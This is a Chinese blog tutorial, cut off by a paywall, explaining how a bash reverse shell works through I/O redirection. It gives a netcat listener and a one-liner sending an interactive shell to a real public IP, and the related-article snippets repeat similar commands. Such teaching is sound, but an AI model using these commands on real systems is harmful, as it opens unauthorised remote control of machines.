彻底理解bash反弹shell

最新推荐文章于 2024-01-24 09:10:19 发布
最新推荐文章于 2024-01-24 09:10:19 发布
阅读量2.5k 收藏 10
点赞数 5
分类专栏: 安全 文章标签: bash 反弹shell I/O重定向
友链:https://cutt.ly/7777aaaa
本文链接:https://blog.csdn.net/include_heqile/article/details/85011135
版权

友链

关注微信公众号回复关键字【资料】获取各种学习资料

在这里插入图片描述

bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求

公网主机:
	nc -lvvp 9090
肉鸡执行:
	bash -i &> /dev/tcp/144.34.164.217/9090 0>&1
		其中144.34.164.217为自己的公网主机

对命令的解释:

bash -i意为创建一个交互式的bash shell
&>意为将标准输出和标准错误都重定向到我们指定的文件中

实验如下:

x@DESKTOP-GR9LS16:~$ cat 1
cat: 1: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 2
cat: 2: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 1 > 2
cat: 1: No such file or directory
x@DESKTOP-GR9LS16:~$ cat 1 &> 2
x@DESKTOP-GR9LS16:~$ cat 2
cat: 1: No such file or directory

x@DESKTOP-GR9LS16:~$ cat 1
I get some words here!!
x@DESKTOP-GR9LS16:~$ cat 2
cat: 2: No such
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
红队系列-溯源与应急反制专题
aming小老弟
11-09 488
日志分析、流量特征分析、内存马。
Shell重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1719
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
反弹shell bash -i命令
m0_37638874的博客
09-07 3959
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
【转】Linuxbash反弹shell原理浅析
mastergu2的博客
11-04 2241
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell命令 bash -i >& /dev/tcp...
花一天时间搞懂反弹shell命令bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
weixin_53306211的博客
10-28 2278
【代码】花一天时间搞懂反弹shell命令
对于反弹shell语句bash命令理解
WihauShe's Blogger
03-10 773
(个人经验,仅供参考,错误之处,敬请谅解) 缘由   在学习Wen渗透过程中,遇到了“反弹shell” 这个专业名词。于是查询找到了整个反弹shell的过程,但对于其中第一条命令尤其不解. bash -i >& /dev/tcp/[ip]/[port] 0>&1 经过   起初如果搜这个bash命令,很难找到这个命令反弹sh...
各种shell反弹方法
weixin_46626737的博客
05-16 2728
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
运维面试题
wx25051的博客
04-10 8711
NETWORK 1 请描述 TCP/IP 协议中主机与主机之间通信的三要素 参考答案 IP 地址(IP address) 子网掩码(subnet mask) IP 路由(IP router) 2 请描述 IP 地址的分类及每一类的范围 参考答案 A 类 1-26 B 类 128-191 C 类 192-223 D 类 224-239 组播(多播) E 类 240-254 科研 3 请描述 A、B、...
一些不错的网页
墨鱼菜鸡
12-06 2402
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
使用本机反弹shell
meteox的博客
09-04 653
有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面 我一般用natapp,使用起来比较简单方便 注册完成后配置下隧道本地要映射的端口 http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。 tcp隧道根据你要监听的端口进行设置。 我这里tcp隧道的本地端口设置为1516。 下载它的客户端后直接在终端中执行命令 ./natapp -authtoken=你的authtoken 可以得到映射后的地址和端
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
qq_53058639的博客
01-24 1217
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
Linux命令——bash
weixin_34007906的博客
11-12 489
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell! 基本使用语法 1 bash-c命令 1 2 3 root@kali:~#bash-cwhoami root root@kali:~# 另外使用-i表示以交互方式运...
Linux安装Jenkins
weixin_30711917的博客
09-24 303
1、先安装jdk 首先执行以下命令查看可安装的jdk版本:yum -y list java* 选择一个版本安装 yum install -y java-1.8.0-openjdk-devel.x86_64 等待安装即可 安装完成之后,查看安装的jdk版本,输入以下指令:java -version 2、安装jenkins wget -O :下载并以不同的文件名保存 y...
linux使用nc 反弹shell
qq_30890029的博客
04-20 516
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
(虚假的应急响应)记一次我云服务器中了挖矿病毒kdevtmpfsi的经历
daxi0ng的博客
10-20 732
1、话说在我10.16号搭建solr复现CVE-2020-13957的时候,为了图省事直接在我的vps本地搭建了一下。 2、今天登陆vps发现,卧槽怎么100%占用,top一下。 好家伙,这是个啥。 3、我一搜发现是个挖矿病毒。赶紧搜一下怎么解决。 删除守护进程 ps -aux | grep kinsing 删除原进程 ps -aux | grep kdevtmpfsi 删除掉相关文件 cd /tmp rm -rf kdevtmpfsi rm -rf /var/tmp/ki
LinuxLinux运行shell脚本提示No such file or directory
Juruo@Security
08-31 748
Linux运行shell脚本提示No such file or directory
zsh: no such file or directory: /usr/local/php
ilovewjiaq的博客
07-20 833
yii框架的项目里无法找到php安装路径,修改yii文件的#!后面内容为php安装路径。whereis php获取php安装路径。
bash反弹shell
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值